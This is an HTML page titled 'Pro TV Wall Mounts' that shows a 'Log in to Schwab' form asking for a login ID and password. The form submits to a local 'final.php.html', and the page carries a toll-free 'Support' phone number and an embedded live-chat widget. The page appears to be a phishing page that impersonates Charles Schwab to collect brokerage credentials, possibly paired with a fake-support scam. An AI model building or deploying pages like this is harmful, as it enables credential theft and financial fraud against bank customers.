<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Pro TV Wall Mounts</title>
    <link href="css/stylesheet.css" rel="stylesheet" type="text/css" />
     <link rel="icon" type="image/x-icon" href="img/favicon-57.png" sizes="32x32">

</head>    
    <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/61f6d15fb9e4e21181bca3f5/1fqm23o7d';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
    
    

    <style>body  {
  background-image: url("img/login-background-hq.png.jpeg");
  background-repeat: no-repeat;
  background-attachment: fixed;
}
</style>
<body>


    <div class="container">
        <form id="contact" action="final.php.html" method="post">
            <div class="logo"><img src="img/logo.jpg"/></div>
            <h3 style="text-align: center;">Log in to Schwab</h3>
            <h4 style="text-align: center;">Not your device? Use a private or incognito window to sign in.</h4>
            
            <fieldset>                
                <input placeholder="Login ID" type="text" required tabindex="1">
            </fieldset>

            <fieldset>                
                <input placeholder="Password" type="Password" tabindex="2" required>
            </fieldset>
            
            <fieldset>
                <button name="submit" type="submit"  id="contact-submit" data-submit="...Sending">Log In</button>
            </fieldset>


  <p><a href="#">Sign in to a business account <br />Privacy Policy</a></p>

          
        </form>

       




  <footer id="footer">
    <div class="container">
      <div class="row">
        <div class="col-md-12">
<a href="tel:+1 (833) 438-7941"><img src="img/phone.png"/>Support +1 (833) 438-7941</a>
</div>
</div>
</footer>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js"></script>


   </div>
</body>
</html>